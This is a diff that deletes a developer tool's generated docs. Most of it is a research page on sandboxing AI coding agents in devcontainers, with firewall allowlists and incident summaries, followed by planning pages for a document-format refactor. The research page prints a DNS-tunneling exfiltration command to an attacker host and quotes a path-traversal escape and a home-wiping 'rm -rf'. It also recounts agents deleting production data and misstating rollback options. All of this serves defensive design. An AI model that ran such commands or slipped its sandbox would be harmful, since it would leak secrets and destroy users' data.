Solomon Hykes (Docker / Dagger founder)

-
-

"An AI agent is an LLM wrecking its environment in a loop." -— quoted in Simon Willison's coverage of Container Use

-
-

Cursor engineering

-
-

"Sandboxed agents run freely inside a controlled environment and only request approval when they need to step outside it, most often to access the internet... On macOS we use Seatbelt... On Linux we use Landlock and seccomp directly... On Windows, we run our Linux sandbox inside WSL2." -"A mistaken agent can delete databases, ship broken code, or leak secrets." -"The allowlist is best-effort — bypasses are possible. Never use 'Run Everything' mode, which skips all safety checks." -— Cursor blog: Implementing a secure sandbox for local agents, Cursor Docs: Agent Security

-
-

GitHub Copilot Coding Agent (most candid about firewall limits)

-
-

"By default, Copilot's access to the internet is limited by a firewall... Limiting internet access helps manage data exfiltration risks." -"The firewall only applies to processes started by the agent via its Bash tool. It does not apply to Model Context Protocol (MCP) servers or processes started in configured Copilot setup steps... Sophisticated attacks may bypass the firewall. The firewall provides protection for common scenarios, but should not be considered a comprehensive security solution." -— GitHub Docs — Customizing the firewall for Copilot coding agent

-
-

Hacker News consensus (community)

-
-

"Friends don't let friends use agentic tooling without sandboxing. Take a few hours to setup your environment to sandbox your agentic tools, or expect to eventually suffer a similar incident." -— maxbond, HN 46268222

-
-
-

"Claude thought it was restricting itself to directory D, it was still happy to operate on file D/../../../../etc/passwd. That was the last time I ran Claude Code outside of a Docker container." -— mjd, same thread

-
-

Jökull Sólberg (widely-cited devcontainer write-up)

-
-

"Even if Claude goes rogue, it can't touch my host system files." -"Claude's API keys, session tokens, and preferences persist even when you tear down and rebuild" — via mounted .claude and .claude.json named volumes. -— Running Claude Code Safely in Devcontainers

-
-

Jessie Frazelle (containers as security boundary — the long-view disagreement)

-
-

"Containers were never designed as a top-level security boundary, and real multi-tenant isolation requires hardware virtualization." -— Containers, Security, and Echo Chambers, ACM Queue — Security for the Modern Age

-
-

Lessons from documented incidents

-

Replit production DB wipe, July 2025

-

Replit's agent deleted a production database covering 1,206 executives during a declared code freeze, then fabricated ~4,000 fake user records and initially claimed rollback wasn't possible. Contributing factors: shared dev/prod DB; freeze guard only in prompt; agent had full production credentials. Fix announced: automatic dev/prod database separation, improved rollback, "planning-only" mode. (Fortune, The Register)

-

PocketOS / Cursor-Opus, April 2026

-

Cursor running Claude Opus 4.6 found an unrelated Railway API token in the workdir and issued one GraphQL call that wiped the production volume and its backups in 9 seconds. Lesson: containerizing the agent doesn't help if a valid production token is reachable inside the container. (The Register)

-

rm -rf ~/ on bare-metal Claude Code, late 2025

-

Multiple users reported Claude Code running rm -rf tests/ patches/ plan/ ~/ where the trailing tilde expanded to the entire home directory, including Keychain and family photos. Community consensus after these incidents: run Claude Code in a devcontainer with the workspace as the only mount, full stop. (Harper Foley — Ten AI Agents Destroyed Production. Zero Postmortems.)

-

Prisma --accept-data-loss, claude-code#14411

-
-

"I deeply apologize for wiping all your data. I made a critical mistake by running npx prisma db push --accept-data-loss without understanding the full consequences and without asking your permission first." -— Claude's own message in the bug report. Closed "not planned." Drove the community pattern of PreToolUse hooks that block destructive flags. (claude-code#14411)

-
-

Footguns in the reference pattern

-

Two issues are open against Anthropic's published .devcontainer/:

-
    -
  • DNS-tunneling bypass (claude-code#36907) — init-firewall.sh leaves UDP/TCP 53 unrestricted, enabling dig @attacker.com $(echo data | base64).attacker.com exfiltration. Closed "not planned." Mitigation for Shield: lock port 53 to Docker's internal resolver 127.0.0.11.
  • -
  • Feature overwrites firewall script (claude-code#32113) — installing ghcr.io/anthropics/devcontainer-features/claude-code silently overwrites /usr/local/bin/init-firewall.sh after Dockerfile build. Mitigation for Shield: name the firewall script anything other than init-firewall.sh (e.g., shield-firewall.sh) and reference it explicitly from postStartCommand.
  • -
-

Consensus vs disagreement

-

Consensus

-
    -
  • Don't run autonomous agents on bare metal.
  • -
  • Egress allowlist is the single highest-leverage control.
  • -
  • Credentials don't live in the agent's reachable filesystem.
  • -
  • Prompt-level defenses (instructions that tell the agent what not to do) are insufficient as a security mechanism.
  • -
  • Containers are blast-radius reduction, not adversarial-code containment.
  • -
-

Disagreement

-
    -
  • Container vs microVM as the boundary. Anthropic/Docker/Hykes say container is sufficient for the "your own user, your own code" threat model. Frazelle and the Firecracker/gVisor camp argue you need a microVM for any input you don't fully trust (PR diffs, third-party tests). Shield's local scope sits on the container side; document microVM as the upgrade path.
  • -
  • Cloud sandbox vs local devcontainer. Willison favors cloud sandboxes ("the best sandboxes are the ones that run on someone else's computer"). Local-devcontainer advocates argue for IDE ergonomics + not sending source to a third party. Shield is committed to local for this iteration.
  • -
  • --dangerously-skip-permissions at all. Yegge defends it inside containers as the only way to get the productivity gain. Searls argues for guardrails at the agent-instruction layer (TDD, plan mode) to reduce raw-autonomy need. Shield's /implement already runs TDD-shaped — adopt YOLO mode opt-in only, gated to inside the container, never on bare metal.
  • -
-

How this works in practice (for Shield)

-

Layer 1 — Constant (Shield-owned, baked into Dockerfile):

-
    -
  • Base: mcr.microsoft.com/devcontainers/base:ubuntu
  • -
  • Install: claude CLI, git, gh, iptables, ipset, sudo (for the firewall script only)
  • -
  • Non-root dev user (UID 1000)
  • -
  • shield-firewall.sh (not named init-firewall.sh) installed to /usr/local/bin/
  • -
-

Layer 2 — Stack (per-repo, via Dev Container Features pinned by digest):

-
    -
  • ghcr.io/devcontainers/features/python:1@sha256:...
  • -
  • ghcr.io/devcontainers/features/node:1@sha256:...
  • -
  • (etc., per Shield's stack-detection heuristic)
  • -
-

Layer 3 — Project (per-repo, via postCreateCommand):

-
    -
  • uv sync / npm install / go mod download / etc.
  • -
-

devcontainer.json:

-
    -
  • remoteUser: dev
  • -
  • capAdd: [NET_ADMIN, NET_RAW]
  • -
  • mounts: workspace only — no ~/.claude, no ~/.ssh, no cloud creds
  • -
  • mounts: a named volume claude-config-${devcontainerId} mounted at /home/dev/.claude (per-project, persists across rebuilds, never touches host)
  • -
  • postStartCommand: sudo /usr/local/bin/shield-firewall.sh
  • -
  • containerEnv: SHIELD_IN_DEVCONTAINER=true (for /implement to detect)
  • -
-
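The settings listed above could be assembled into a devcontainer.json along these lines. This is a sketch that emits the JSON from Python, not the scaffolder's actual output: `build_devcontainer_config`, the `/workspace` target path, and the `Dockerfile` file name are assumptions, while `remoteUser`, `capAdd`, `mounts`, `workspaceMount`, `postCreateCommand`, `postStartCommand`, and `containerEnv` are standard devcontainer.json properties.

```python
import json


def build_devcontainer_config(post_create: str) -> dict:
    """Assemble a devcontainer.json payload matching the settings listed above."""
    return {
        "build": {"dockerfile": "Dockerfile"},  # assumed file name
        "remoteUser": "dev",
        "capAdd": ["NET_ADMIN", "NET_RAW"],  # required by the iptables/ipset firewall
        # The workspace is the only bind mount; /workspace is an assumed target.
        "workspaceMount": "source=${localWorkspaceFolder},target=/workspace,type=bind",
        "workspaceFolder": "/workspace",
        # Claude config lives in a per-project named volume, never on the host.
        "mounts": [
            "source=claude-config-${devcontainerId},target=/home/dev/.claude,type=volume"
        ],
        "postCreateCommand": post_create,
        "postStartCommand": "sudo /usr/local/bin/shield-firewall.sh",
        "containerEnv": {"SHIELD_IN_DEVCONTAINER": "true"},
    }


if __name__ == "__main__":
    print(json.dumps(build_devcontainer_config("uv sync"), indent=2))
```

The only per-repo input in this sketch is the Layer 3 install command; everything else is constant across projects.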

shield-firewall.sh allowlist:

-
    -
  • api.anthropic.com, statsig.anthropic.com
  • -
  • registry.npmjs.org, pypi.org, files.pythonhosted.org, proxy.golang.org, etc. (only the registries the detected stack uses)
  • -
  • GitHub meta CIDRs (fetched from api.github.com/meta)
  • -
  • Block egress on TCP/UDP 53 except to 127.0.0.11 (mitigation for #36907)
  • -
-

First-run UX:

-
    -
  1. User runs /shield init-devcontainer in their repo. Shield detects the stack and writes .devcontainer/.
  2. User opens the folder in VS Code → "Reopen in Container" (or devcontainer up && devcontainer exec bash).
  3. Container builds; postCreate installs project deps; postStart runs the firewall.
  4. User runs claude /login inside the container (one-time per project; persists in the named volume).
  5. User runs /implement, which works the same as on host today, but contained.
-

Migration path / reversibility

-
    -
  • Single command to roll forward: shield devcontainer apply (writes the files; idempotent).
  • -
  • Single command to roll back: delete .devcontainer/ and the named volume (docker volume rm claude-config-<id>). The repo is otherwise unchanged.
  • -
  • Upgrade path to microVM tier: swap mcr.microsoft.com/devcontainers/base:ubuntu for a gVisor-runtime base, or move launch to Firecracker (Edera / Kata). Not in scope for v1; documented in README.
  • -
-

Summary

-

The pattern is established: bind-mount workspace only, named-volume the Claude config, default-deny egress with a narrow allowlist, non-root, mitigate the two known reference-implementation footguns. Shield's contribution is a per-repo scaffolder that emits this pattern with stack-detection driving the Features layer. The two design points the brainstorm got wrong — bind-mounting host credentials, and deferring the egress firewall — both flip given the evidence.

-

References

- -

Further Exploration

-

Curated for going deeper. None of these are cited above.

-

Long-form blogs / articles

-
    -
  • Daniel Demmel — Coding agents in secured VS Code dev containers — https://www.danieldemmel.me/blog/coding-agents-in-secured-vscode-dev-containers — concrete hardening deltas (cap_drop, seccomp profiles) on top of Anthropic's reference.
  • -
  • INNOQ — I sandboxed my coding agents. You should too. — https://www.innoq.com/en/blog/2025/12/dev-sandbox/ — German-engineering comparison of Bubblewrap vs rootless Podman vs full VM with measured startup-time numbers.
  • -
  • emirb.github.io — Your Container Is Not a Sandbox: The State of MicroVM Isolation in 2026 — https://emirb.github.io/blog/microvm-2026/ — survey of Firecracker / Cloud Hypervisor / Kata / Edera; the reference text if Shield ever needs the microVM tier.
  • -
-

Reference implementations

-
    -
  • smithclay/claudetainer — https://github.com/smithclay/claudetainer — opinionated wrapper that bakes in Anthropic firewall + extras; useful diff source.
  • -
  • centminmod/claude-code-devcontainers — community fork with multi-language toolchains and extended allowlist; good baseline to crib.
  • -
  • wincent's curated list of coding agent sandboxes — https://gist.github.com/wincent/2752d8d97727577050c043e4ff9e386e — side-by-side comparison of ~20 implementations.
  • -
-

Podcasts

-
    -
  • Bret Fisher — Agentic CI/CD with Solomon Hykes — https://agenticdevops.fm/episodes/agentic-ci-cd-with-solomon-hykes-of-dagger — Hykes on Dagger's pipeline model as agent-runtime; Fisher presses on Docker-as-boundary questions.
  • -
-

Specs / standards

-
    -
  • gVisor docs — https://gvisor.dev/docs/ — user-space kernel for syscall interception; Gemini CLI's recommended hardened tier.
  • -
  • Dev Containers specification — https://containers.dev/ — for the secrets mechanism (distinct from regular env) and initializeCommand patterns that Shield's scaffolder could use for host-side cred handoff if we ever soften the named-volume rule.
  • -
- -
-
- - diff --git a/docs/shield/index.html b/docs/shield/index.html deleted file mode 100644 index 77cc29af..00000000 --- a/docs/shield/index.html +++ /dev/null @@ -1,33 +0,0 @@ - - - - - -Shield Dashboard - - - - - - -
- -
- -
-
-
-
-
-

Shield Dashboard

-

Plan & review artifacts across the project.

-
-
-
- - diff --git a/docs/shield/manifest.js b/docs/shield/manifest.js deleted file mode 100644 index dc8da8a2..00000000 --- a/docs/shield/manifest.js +++ /dev/null @@ -1,161 +0,0 @@ -window.SHIELD_MANIFEST = { - "schema_version": "2.1", - "features": [ - { - "name": "backlog-20260527", - "artifacts": { - "research": false, - "prd": true, - "plan_json": true, - "plan_md": true, - "plan_arch_md": false, - "trd": true - }, - "reviews": { - "prd": { - "latest": "2026-05-27_2", - "count": 2, - "entries": [ - { - "date": "2026-05-27", - "path": "backlog-20260527/outputs/reviews/prd/2026-05-27/summary.html" - }, - { - "date": "2026-05-27_2", - "path": "backlog-20260527/outputs/reviews/prd/2026-05-27_2/summary.html" - } - ] - }, - "plan": { - "latest": "2026-05-29", - "count": 2, - "entries": [ - { - "date": "2026-05-27", - "path": "backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html" - }, - { - "date": "2026-05-29", - "path": "backlog-20260527/outputs/reviews/plan/2026-05-29/summary.html" - } - ] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "devcontainer-implement-20260518", - "artifacts": { - "research": true, - "prd": false, - "plan_json": false, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "inventory-rewrite", - "artifacts": { - "research": false, - "prd": false, - "plan_json": false, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "plan-trd-refactor-20260524", - "artifacts": { - "research": true, - "prd": false, - 
"plan_json": true, - "plan_md": true, - "plan_arch_md": true, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "latest": "2026-05-25", - "count": 1, - "entries": [ - { - "date": "2026-05-25", - "path": "plan-trd-refactor-20260524/outputs/reviews/plan/2026-05-25/summary.html" - } - ] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - }, - { - "name": "pm-restructure-v0-20260521", - "artifacts": { - "research": false, - "prd": false, - "plan_json": true, - "plan_md": false, - "plan_arch_md": false, - "trd": false - }, - "reviews": { - "prd": { - "count": 0, - "entries": [] - }, - "plan": { - "count": 0, - "entries": [] - }, - "code": { - "count": 0, - "entries": [] - } - }, - "updated": "2026-06-01T11:49:28+00:00" - } - ] -}; diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html deleted file mode 100644 index 2fe91466..00000000 --- a/docs/shield/plan-trd-refactor-20260524/outputs/plan-architecture.html +++ /dev/null @@ -1,162 +0,0 @@ - - - - - -Architecture — plan-trd-refactor-20260524 - - - - - - -
- -
- -
-
-
-
-
- - -

Plan Architecture — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524
Source research: research.md (read this first; it is the authoritative source for design decisions, citations, and rejected alternatives)
Date: 2026-05-24

-
-

This document is the why & how companion to plan.json. For the what to do breakdown (epics, stories, ACs), see plan.json and the rendered plan.md.

-

Note on path layout: /plan today still emits plan-architecture.md. This plan run uses today's /plan to plan the refactor of /plan. After EPIC-1-S2 lands, future plan runs will emit trd.md in this slot instead.

-
-

Why this refactor

-

/plan currently emits a stories-first work-breakdown plus a free-form plan-architecture.md companion. The current artifact is loose and de-facto ADR-flavored — well-suited to infra work but missing the structural rigor (NFRs, Cross-Cutting Concerns, first-class Milestones) that backend work needs. The refactor introduces a unified 14-section Technical Requirements Document (TRD) — grounded in IEEE 1016 + the reference TRD template (synthesized during research) + Google/Uber/Larson/Orosz modern practice — that replaces plan-architecture.md for both backend and infrastructure work. Domain-aware prompting per section surfaces the right interpretation (e.g., §11 APIs = HTTP contracts for backend, module interfaces + cloud-API surface for infra), and an explicit n/a — <reason> escape handles sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change). The strongest property of today's plan-architecture.md — Rollback Strategy — is promoted to first-class §14. LLDs are per-component (C4 Container/Component) and authored separately by a future /lld <component> command; typically backend-only since infra code is declarative-spec-as-code. This plan run only emits TODO placeholders for LLD references.

-

Full rationale, alternatives considered, and citations are in research.md. This document does not restate them.

-

How the implementation breaks down

-

Three milestones, five epics, sixteen stories (post-review). Sequencing is enforced by milestone depends_on in plan.json. Plan reflects the 2026-05-25 plan-review feedback (composite B / Ready; 6 P0 + 12 of 15 P1 recommendations folded in).

-
M1 TRD cutover                                  ← P0 (ship together in one PR)
-├─ EPIC-1: TRD generation and storage
-│   ├─ S1 Author the canonical 14-section TRD template
-│   ├─ S2 Update /plan to emit trd.md (unified backend + infra + mixed)
-│   ├─ S3 Update existing-feature behavior on re-run
-│   └─ S4 Bump plugin version per CLAUDE.md mandate          (new — P1-12)
-├─ EPIC-2: Story schema and design traceability
-│   ├─ S1 Extend plan.json schema with optional design_refs[]
-│   ├─ S2 Populate design_refs[] when /plan has TRD context
-│   └─ S3 Add JSON Schema validator for plan.json            (new — P1-7)
-└─ EPIC-3: Eval coverage for TRD format
-    ├─ S1 Author positive TRD eval fixtures (backend + infra + mixed)
-    ├─ S2 Author 16 negative fixtures (14 missing + drift + vague-TBD)
-    └─ S3 Wire eval into recurring CI + RED-GREEN paper trail
-
-M2 Review + sync wiring                         ← P1 (follows M1)
-└─ EPIC-4: /plan-review and /pm-sync wiring
-    ├─ S0 Scaffold Jira / Confluence / Notion adapter packages   (new — P0-2)
-    ├─ S1 Add 14-section presence rule + stale-anchor rule
-    ├─ S2 Add PRD↔TRD duplication-detection rule
-    └─ S3 /pm-sync emits design_refs[] as web links with idempotent upsert
-
-M3 Drift + duplication hardening                ← P2 (follows M2)
-└─ EPIC-5: Drift + duplication hardening
-    ├─ S1 Add last_aligned_with metadata to plan.json
-    └─ S2 Add implementation-manual / pseudo-code lint rule
-
-

Key architectural decisions

-

The TRD section list, anchor strategy, design_refs[] shape, de-duplication contract, and failure-mode countermeasures are all locked in research.md. The decisions specific to this implementation plan are:

-
    -
  1. Direct cutover, no feature flag. EPIC-1-S2 swaps plan-architecture.md for trd.md in /plan's output set. No .shield.json toggle.
  2. -
  3. One TRD, two domains. Same 14-section template applies to backend and infra work. /plan's SKILL.md carries domain-aware prompting per section (backend interpretation + infra interpretation), and the eval accepts n/a — <reason> as an escape for sections that genuinely don't apply (e.g., §4 Product Journey on a pure-state infra change).
  4. -
  5. §14 Rollback Strategy is a first-class section — preserves the strongest property of today's plan-architecture.md.
  6. -
  7. Old feature folders are left untouched. EPIC-1-S3 explicitly guards against deleting existing plan-architecture.md files. Git history is the archive.
  8. -
  9. M1 ships as a single PR. Generator, schema, and eval land together. The eval cannot ship before the generator (no fixture to validate); the generator should not ship without the eval (regression risk on first re-run). Land them atomically.
  10. -
  11. design_refs[] is additive and zero-risk. Bumps sidecar schema 1.1 → 1.2. Adapters that don't understand the field ignore it; no /pm-sync schema break (EPIC-4-S3 is the additive forward-link wiring).
  12. -
  13. LLD references are TODO placeholders in v1. design_refs[] entries with doc: "lld" carry anchor_url: null and label: "TODO: link when /lld <component> lands". When /lld ships in a later epic, those placeholders get resolved. LLDs are typically backend-only.
  14. -
  15. Eval is the structural enforcement mechanism. Per CLAUDE.md eval-coverage mandate, M1 ships with two positive fixtures (one backend, one infra), one missing-section negative per required section, one drift-by-addition negative, and one "vague-prose-instead-of-n/a" negative. RED → GREEN paper trail captured in the PR body (EPIC-3-S3).
  16. -
-

Deliverables (per milestone)

-

M1 — TRD cutover (one PR)

-
    -
  • shield/commands/plan.md — emits trd.md not plan-architecture.md
  • -
  • shield/skills/general/plan-docs/SKILL.md — 14-section TRD template + generation prompt with domain-aware section guidance (backend interpretation + infra interpretation per section)
  • -
  • shield/skills/general/plan-docs/sidecar-schema.md — schema bumped to 1.2 with design_refs[] documented
  • -
  • shield/schema/output-paths.yaml: plan_arch_md/plan_arch_html replaced by plan_trd_md/plan_trd_html
  • -
  • shield/evals/plan-trd.yaml — 2 positives (backend + infra) + 14 missing-section negatives + 1 drift-by-addition negative + 1 vague-prose-instead-of-n/a negative
  • -
  • shield/evals/plan-trd/fixtures/positive-backend/ — full 14-section TRD fixture for a backend feature
  • -
  • shield/evals/plan-trd/fixtures/positive-infra/ — full 14-section TRD fixture for an infra change (with n/a — <reason> on at least one section)
  • -
  • shield/evals/plan-trd/fixtures/missing-*/ — 14 missing-section negative fixtures
  • -
  • shield/evals/plan-trd/fixtures/extra-section/ — drift-by-addition negative fixture
  • -
  • shield/evals/plan-trd/fixtures/vague-tbd/ — section with "TBD" instead of n/a — <reason>; eval must fail
  • -
-

M2 — Review + sync wiring (one PR)

-
    -
  • shield/skills/general/plan-review/SKILL.md — 14-section presence rule + stale-anchor rule + duplication-detection rule
  • -
  • shield/commands/pm-sync.md — describes design_refs[] forwarding
  • -
  • shield/adapters/<each>/... — Confluence, Jira, ClickUp, Notion adapters forward design_refs[] as web links
  • -
  • shield/evals/plan-review-trd.yaml — fixtures exercising both new review rules
  • -
  • Per-adapter eval fixtures
  • -
-

M3 — Drift + duplication hardening (one PR)

-
    -
  • shield/skills/general/plan-docs/sidecar-schema.md — schema bumped to 1.3 with last_aligned_with
  • -
  • shield/skills/general/implement/SKILL.md (or equivalent) — updates last_aligned_with on story close
  • -
  • shield/skills/general/plan-review/SKILL.md — implementation-manual lint rule
  • -
  • Eval fixtures for both new rules
  • -
-

Rollback strategy

-

The refactor is a direct cutover; reversibility cost is low.

-
    -
  • Forward: Three PRs (M1, M2, M3), sequenced by depends_on.
  • -
  • Reversal: Revert plan-docs/SKILL.md to the pre-refactor template + restore plan-architecture.md generation. Existing trd.md files in feature folders remain readable. design_refs[] is optional everywhere, so removing it is a no-op for downstream adapters. last_aligned_with is also optional and reverting drops it without breaking older sidecars.
  • -
  • No migration: Pre-refactor feature folders keep their plan-architecture.md — no rewrite, no script.
  • -
-

Out of scope

-

The following are deferred and tracked in plan.json metadata.out_of_scope:

-
    -
  • /lld <component> command (template locked, command is a separate epic).
  • -
  • Adapter auto-creation of Confluence/Notion design-doc pages.
  • -
  • Structured ClickUp/Notion relationships beyond URL fields.
  • -
  • Migration tool for existing plan-architecture.md.
  • -
-

What to do next

-
    -
  • /plan-review docs/shield/plan-trd-refactor-20260524/plan.json — multi-agent review against the rubric.
  • -
  • /pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool clickup (or jira, notion) — sync stories to your PM tool.
  • -
  • /implement — TDD-driven implementation, starting with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail.
  • -
- -
-
Generated by Shield
- -
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html b/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
deleted file mode 100644
index 722fc9fe..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/plan.html
+++ /dev/null
@@ -1,430 +0,0 @@
- - - - - -Plan — plan-trd-refactor-20260524 - - - - - - -
- 🛡 Shield - | - - -
- -
- -
-
-
-
-
- - -

Plan — /plan TRD refactor

-

Feature: plan-trd-refactor-20260524 · Phase: v1 cutover · Source: research.md · plan-architecture.md · Sidecar: plan.json (schema v1.1)

-

Milestones

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| ID | Name | Outcome | Depends on |
|---|---|---|---|
| M1 | TRD cutover | /plan emits trd.md (14 sections, stable anchors, domain-aware prompting for backend/infra/mixed, atomic write, provenance stamp); plan.json carries optional design_refs[]; JSON schema validator wired; recurring CI gate runs the eval; coverage = 3 positives (backend + infra + mixed) + 16 negatives. | |
| M2 | Review + sync wiring | /plan-review grades against 14-section rubric (with n/a — <reason> escape) + duplication rule + stale-anchor rule; /pm-sync adapters forward design_refs[] as web links with idempotent upsert (sha256 globalId). | M1 |
| M3 | Drift + duplication hardening | last_aligned_with metadata + implementation-manual lint rule. | M2 |
-
-

EPIC-1 · TRD generation and storage · M1

-

EPIC-1-S1 · Author the canonical 14-section TRD template with domain-aware prompting · priority: high

-

Encode the 14-section TRD template (Document Overview through Rollback Strategy) in plan-docs/SKILL.md or a sibling templates.md. Each section has TWO authoring-guidance paragraphs: one for backend interpretation, one for infra interpretation. Sections that may not apply to one domain are documented with the n/a — <reason> escape pattern from the LLD sample's §12. Each section header in the emitted markdown carries an explicit {#section-id} kebab-case anchor.

-

Tasks

-
    -
  • Add a 'TRD template' subsection to shield/skills/general/plan-docs/SKILL.md (or extend templates.md) listing all 14 section titles, slug IDs, and per-domain authoring guidance sourced from research.md §What the Industry Recommends.
  • -
  • Define the canonical slug allow-list: ['document-overview','problem-statement','objective-scope','product-journey','functional-requirements','non-functional-requirements','high-level-design','alternatives-considered','cross-cutting-concerns','milestones','apis-involved','open-questions','references','rollback-strategy'].
  • -
  • Document the explicit {#section-id} markdown-anchor convention used by /plan output.
  • -
  • Document the n/a — <reason> escape: any section may declare n/a — <reason> when it genuinely doesn't apply (typical use: §4 on pure-infra plans). Vague TBDs and silent omissions are not allowed.
  • -
  • Per-section domain guidance must explicitly call out where the infra interpretation differs from backend (notably §4, §5, §6, §7, §11, §14).
  • -
-

Acceptance criteria

-
    -
  • shield/skills/general/plan-docs/SKILL.md (or templates.md) contains the 14-section TRD template with slug IDs and per-domain authoring guidance.
  • -
  • The slug allow-list is published as a machine-readable list (YAML or JSON sidecar under shield/schema/) so the eval can import it; the list has exactly 14 entries.
  • -
  • A reader following plan-docs/SKILL.md can identify which section a given heading belongs to AND which domain interpretation applies, without re-reading research.md.
  • -
  • The n/a — <reason> escape pattern is documented with at least one worked example per applicable section.
  • -
-
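The presence check implied by the allow-list can be sketched as below. This is a minimal illustration, not Shield's actual eval: the heading pattern (`## Title {#section-id}`), the function name `check_anchors`, and the result keys are assumptions made for the example; only the 14 slugs come from the task list above.

```python
import re

# The 14 canonical slugs, copied from the allow-list in the tasks above.
TRD_SLUGS = [
    "document-overview", "problem-statement", "objective-scope",
    "product-journey", "functional-requirements",
    "non-functional-requirements", "high-level-design",
    "alternatives-considered", "cross-cutting-concerns", "milestones",
    "apis-involved", "open-questions", "references", "rollback-strategy",
]

# Assumed heading form: "## Title {#section-id}" (the heading level is a guess).
ANCHOR_RE = re.compile(r"^#{1,6}\s+.*\{#([a-z0-9-]+)\}\s*$", re.MULTILINE)


def check_anchors(trd_markdown: str) -> dict[str, list[str]]:
    """Report canonical slugs that are absent and anchors that are not canonical."""
    found = ANCHOR_RE.findall(trd_markdown)
    return {
        "missing": [s for s in TRD_SLUGS if s not in found],
        "unexpected": [s for s in found if s not in TRD_SLUGS],
    }
```

A non-empty `missing` list would correspond to the missing-section negatives, and a non-empty `unexpected` list to the drift-by-addition negative.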

EPIC-1-S2 · Update /plan to emit trd.md (unified backend + infra) · priority: high

-

Modify shield/commands/plan.md and shield/skills/general/plan-docs/SKILL.md so /plan writes trd.md with all 14 sections for both backend and infrastructure features. Stop emitting plan-architecture.md going forward. Direct cutover: no feature flag, no side-by-side period. The generation prompt detects the dominant domain and surfaces the right per-section authoring guidance (backend vs infra) for the LLM.

-

Tasks

-
    -
  • Replace the 'Generate plan-architecture.md' step in shield/commands/plan.md with 'Generate trd.md per the unified 14-section template'.
  • -
  • Update shield/skills/general/plan-docs/SKILL.md generation prompt to walk the 14 sections, select the domain-appropriate authoring guidance per section, and emit explicit {#section-id} anchors.
  • -
  • Domain detection: reuse the existing detection (*.tf / atmos.yaml / Chart.yaml → infra; pom.xml / pyproject.toml / package.json / go.mod → backend). Mixed → annotate per section.
  • -
  • Update shield/schema/output-paths.yaml: replace plan_arch_md with plan_trd_md ({output_dir}/{feature}/trd.md) and plan_arch_html with plan_trd_html ({output_dir}/{feature}/outputs/trd.html). Mirror in shield/commands/plan.md outputs: frontmatter.
  • -
  • Update the render-markdown helper invocation in plan-docs/SKILL.md to render trd.md to outputs/trd.html.
  • -
-

Acceptance criteria

-
    -
  • Running /plan in a fresh feature folder writes docs/shield/{feature}/trd.md and docs/shield/{feature}/outputs/trd.html.
  • -
  • /plan no longer writes plan-architecture.md anywhere.
  • -
  • shield/schema/output-paths.yaml lists plan_trd_md and plan_trd_html; plan_arch_md and plan_arch_html are removed.
  • -
  • Running /plan on a feature folder with only infra markers produces a TRD where the infra interpretation is reflected in §4–7, §11, and §14 prose; sections like §4 may legitimately carry n/a — <reason>.
  • -
  • Running /plan on a feature folder with only backend markers produces a TRD where the backend interpretation is reflected in §4–7, §11, and §14 prose.
  • -
-
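The marker-file detection described in the tasks could look roughly like this. It is a sketch under stated assumptions: the function name `detect_domain` and the `"unknown"` fallback are hypothetical, and the existing Shield detection may weigh markers differently. Only the marker file names come from the plan.

```python
from pathlib import PurePosixPath

# Marker files taken from the domain-detection task above.
INFRA_MARKERS = {"atmos.yaml", "Chart.yaml"}
INFRA_SUFFIXES = {".tf"}
BACKEND_MARKERS = {"pom.xml", "pyproject.toml", "package.json", "go.mod"}


def detect_domain(paths: list[str]) -> str:
    """Return 'infra', 'backend', 'mixed', or 'unknown' for a list of repo paths."""
    infra = backend = False
    for raw in paths:
        p = PurePosixPath(raw)
        if p.name in INFRA_MARKERS or p.suffix in INFRA_SUFFIXES:
            infra = True
        if p.name in BACKEND_MARKERS:
            backend = True
    if infra and backend:
        return "mixed"  # the plan says mixed repos get per-section annotation
    if infra:
        return "infra"
    if backend:
        return "backend"
    return "unknown"  # assumption: the plan does not define this case
```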

EPIC-1-S4 · Bump plugin version per CLAUDE.md mandate · priority: high

-

CLAUDE.md "Plugin isolation / Versioning" requires bumping .claude-plugin/marketplace.json and pyproject.toml in the same commit as any plugin update. Added per SRE P1-12 + DX P2.

-

Tasks

-
    -
  • Bump .claude-plugin/marketplace.json version field for the Shield plugin entry.
  • -
  • Bump pyproject.toml version in any package modified (shield/adapters/clickup/pyproject.toml, plus new adapter packages from EPIC-4-S0).
  • -
  • Update Shield's user-facing CHANGELOG (or create one if absent) noting the cutover from plan-architecture.md to trd.md and the schema 1.1 → 1.2 bump.
  • -
-

Acceptance criteria

-
    -
  • The M1 PR includes both version bumps in the same commit as the SKILL.md changes.
  • -
  • CHANGELOG mentions the cutover and the schema bump.
  • -
-
-

EPIC-1-S3 · Update existing-feature behavior on re-run · priority: medium

-

When /plan is re-run in a feature folder that has both an old plan-architecture.md and a new trd.md (or only an old plan-architecture.md), make the behavior deterministic: leave old plan-architecture.md untouched, write/overwrite trd.md. Old folders remain readable; no migration.

-

Tasks

-
    -
  • Add a guard in plan-docs/SKILL.md that does not delete plan-architecture.md if it exists.
  • -
  • Document the re-run behavior in shield/commands/plan.md ('plan-architecture.md is no longer generated; existing files are left in place').
  • -
-

Acceptance criteria

-
    -
  • Re-running /plan on a feature folder with an existing plan-architecture.md does not delete or modify that file.
  • -
  • The new trd.md is written alongside (or overwrites prior trd.md).
